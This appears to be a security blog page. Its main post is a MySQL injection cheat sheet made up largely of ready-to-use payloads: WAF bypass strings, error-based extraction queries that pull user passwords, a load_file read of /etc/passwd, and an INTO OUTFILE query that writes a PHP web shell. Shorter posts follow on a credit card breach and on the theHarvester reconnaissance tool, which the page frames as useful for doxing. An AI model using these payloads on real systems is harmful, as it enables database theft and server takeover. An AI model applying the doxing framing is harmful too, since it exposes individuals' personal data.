MySQL Injection Cheet Sheet (Including Load File and Outfile for Error Based) + WAF Bypassing Methods

MySQL Injection Cheat Sheet

Comments:

Comments are very useful and can sometimes even help bypass certain WAF procedures. These comments are the ones that I have picked up over the last few years:

-- (Simple Comment) --+- (String Based Comment) /* (Multiple Line Comment) # (Single Line Comment) /*!*/ (Bypasses certain WAFs) -- a (Bypasses certain WAFs)

Selecting version:

To select the version, many commands can be used. The list of common commands used to find the version using SQL injection are:

SELECT version() SELECT @@version SELECT @@version_comment SELECT @@version_compile_machine SELECT @@version_compile_os

Finding Database Name (Current):

To select the current database name, the command "select database()" can be used:

SELECT database()

 Finding Error Log Dir:

This can especially help when trying to find a write-able path or even to find the full path of the directory.

SELECT @@log_error

 Finding Columns:

In order to find columns, you can follow two simple methods:

a) Using (union+select+1) and increasing the column count each time until a page with different or abnormal characteristics come up. For example:  www.example.tld/news.php?id=-1+union+select+1-- (Error) www.example.tld/news.php?id=-1+union+select+1,2-- (Error) www.example.tld/news.php?id=-1+union+select+1,2,3-- (No Error) This would mean that the column count is 3. b) Using (order by) statements and increasing the count until a message similar to (Unknown column '[column count here]' in 'order clause') is visible. For example: www.example.tld/news.php?id=-1+order+by+1-- (Error or other page) www.example.tld/news.php?id=-1+order+by+2-- (Error or other page) www.example.tld/news.php?id=-1+order+by+3-- (Unknown column '3' in 'order clause') This would mean that the column count is also 3.

Bypass WAF using encryptions and other methods:

These methods can be quite useful in order to bypass certain WAF protocols. By using these, it may allow for data retrieval bypassing WAF put in place.

union select cast(version() as latin1)-- union select convert(version() as binary)-- union select aes_decrypt(aes_encrypt(version(),1),1)-- union select unhex(hex(versions()))--

Other methods of bypassing WAF include (Credits: slack3rsecurity):

/*!union*/ /*select*/ version()-- //MySQL comments. unUNIONion seleSELECTct version()-- //Filter bypass /**/union/**/select/**/version()--  //Whitespace bypass UnION SElecT version()--  //Mixed upper/lower uni/**/on sel/**/ect version()-- //php comments. uni%6Fn select version()-- //URL encoding. %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--  //Taking advantage of a WAF that only decodes input once. 0×414141414141414141414141414141414141 union select version()--  //Buffer overflow. union select 0x3a3a3a--  //Encode to bypass magic quotes.

 Extracting Data (Tables and Columns) Using Multiple Methods:

The following methods can be used depending on the server type and version in order to extract data through SQLi. Credit once again goes to #slack3rsecurity and Blackfan.

Rand() and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))-- and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) -- or (select count(*) from table group by concat(version(),floor(rand(0)*2)))-- union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- Name_const(Mysql 5.0.12 > 5.0.64) or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)-- Extractvalue & updatexml (MySQL 5.1+) and extractvalue(rand(),concat(0x3a,version()))--  //Xpath error and updatexml(rand(),concat(0x3a,version()))-- //Xpath error Misc. (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- (@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--

INTO Outfile and INTO Loadfile (Error Based):

To load etc/passwd using error based injections we can use this query: and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a) To write a file using error based injections we can simply use this command: or row(1,1) > (select count(*),concat((select (“<?php system($_GET[c]);?>”) into outfile ‘/tmp/shell.php’),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)

Useful directories and files:

Files to check IF LFI is present or Load File is working:
(To find full path)

/etc/init.d/apache /etc/init.d/apache2 /etc/httpd/httpd.conf /etc/apache/apache.conf /etc/apache/httpd.conf /etc/apache2/apache2.conf /etc/apache2/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/httpd.conf /opt/apache/conf/httpd.conf /home/apache/httpd.conf /home/apache/conf/httpd.conf /etc/apache2/sites-available/default /etc/apache2/vhosts.d/default_vhost.include

Credits:

Slack3rSecurity, Hakipedia and Blackfan.

To be continued....

(More to be added to this page in the future)

Half a million credit cards stolen from an Australian business

In recent times, an European crime syndicate has fled with around half a million card details from supposedly a "small Australian business".

My first thought on this was, if the business was small, they wouldn't have half a million cards stored somewhere on their databases and/or systems. My second thought however was, perhaps this "small" business isn't so small after all? Maybe, this business is actually quite big and that it has been covering its name in order to protect itself from the media and its customers.

Regardless of this, half a million cards were still stolen. In the nature of the incident, it sounds as if these cards were not even protected in the simplest forms and the standards of security were astonishing. Any business who wishes to process credit cards should always have secure and tight security measures which grant them the safety and reliability that their company really needs. The methods that they could have used to secure the cards are limitless! They could have hashed them with suppose a secure SHA-256 (http://www.xorbin.com/tools/sha256-hash-calculator) or they could have deleted cards except for the last 4 digits as a method for verification as they had processed the cards, but instead they stored them insecurely and now banks are on a high alert.

Fraud is a big game in the contemporary hacking scene. Majority of hackers, in this current time have had some sort of involvement with fraud or have once or still do participate in it. For them, credit cards are nothing but numbers, which can or will get them rich if they use them correctly. They don't emphasise for the people that they are really hurting and really do not have any sense of morale. Day by day, fraud is only increasing, and it's up to us to make sure we know if the person we are transferring details to is secure.

SQL Injections, RDP bruteforcing, XSS attacks, and even MITM attacks. These techniques all make it possible for hackers to obtain databases and potentially steal credit cards as well as destroy lives.

Stay Safe, Stay Secure.
EPZSecurity.

theHarvester 2.2 by Edge Security - Information Grabber

'theHarvester' is a robust tool created by Edge Security which allows the gathering of various data such as emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database. 

In the blackhat world, people may find the theHarvester as a useful tool to "dox" individuals through a simple python command line interface.

The tool can be downloaded from their official repository located at: https://code.google.com/p/theharvester/

Be sure to check out theHarvester's creator, Edge Security: http://www.edge-security.com

Usage: theharvester options
       -d: Domain to search or company name
       -b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
       -s: Start in result number X (default 0)
       -v: Verify host name via dns resolution and search for virtual hosts
       -f: Save the results into an HTML and XML file
       -n: Perform a DNS reverse query on all ranges discovered
       -c: Perform a DNS brute force for the domain name
       -t: Perform a DNS TLD expansion discovery
       -e: Use this DNS server
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
       -h: use SHODAN database to query discovered hosts
            google 100 to 100, and pgp doesn't use this option)
Examples:./theharvester.py -d microsoft.com -l 500 -b google
         ./theharvester.py -d microsoft.com -b pgp
         ./theharvester.py -d microsoft -l 200 -b linkedin